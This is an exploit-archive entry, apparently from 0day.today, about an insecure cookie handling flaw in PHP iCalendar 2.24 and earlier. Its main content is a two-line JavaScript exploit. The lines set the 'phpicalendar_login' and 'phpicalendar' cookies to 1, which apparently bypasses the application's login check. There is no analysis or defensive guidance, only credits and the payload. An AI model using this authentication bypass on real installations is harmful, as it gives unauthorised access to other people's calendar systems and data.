id: 3721
date: 09/21/2008
title: PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

============================================================
PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability 
============================================================


###############################################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";




#  0day.today [2023-03-26]  #